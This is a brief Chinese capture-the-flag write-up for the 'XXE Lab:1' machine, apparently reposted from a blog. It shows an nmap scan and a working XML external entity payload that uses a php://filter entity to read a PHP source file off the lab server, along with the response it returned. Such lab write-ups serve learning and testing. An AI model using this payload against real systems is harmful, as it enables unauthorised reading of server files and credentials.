XXE Lab:1题解

思路

题目已经提示是XXE的专项练习,所以,直接找XXE问题.

难度

入门

端口扫描

nmap -sS -A 10.129.10.64

发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件
XXE Lab:1题解

80端口检查

其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。
构造如下payload,读取页面源码,获得一不知是flag还是flag Hint的内容:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root><name>&admin;</name><password>123</password></root>

响应:

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

于是,陷入蒙蔽。。。。等待作者反馈中

转载于:https://blog.51cto.com/executer/2314187

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值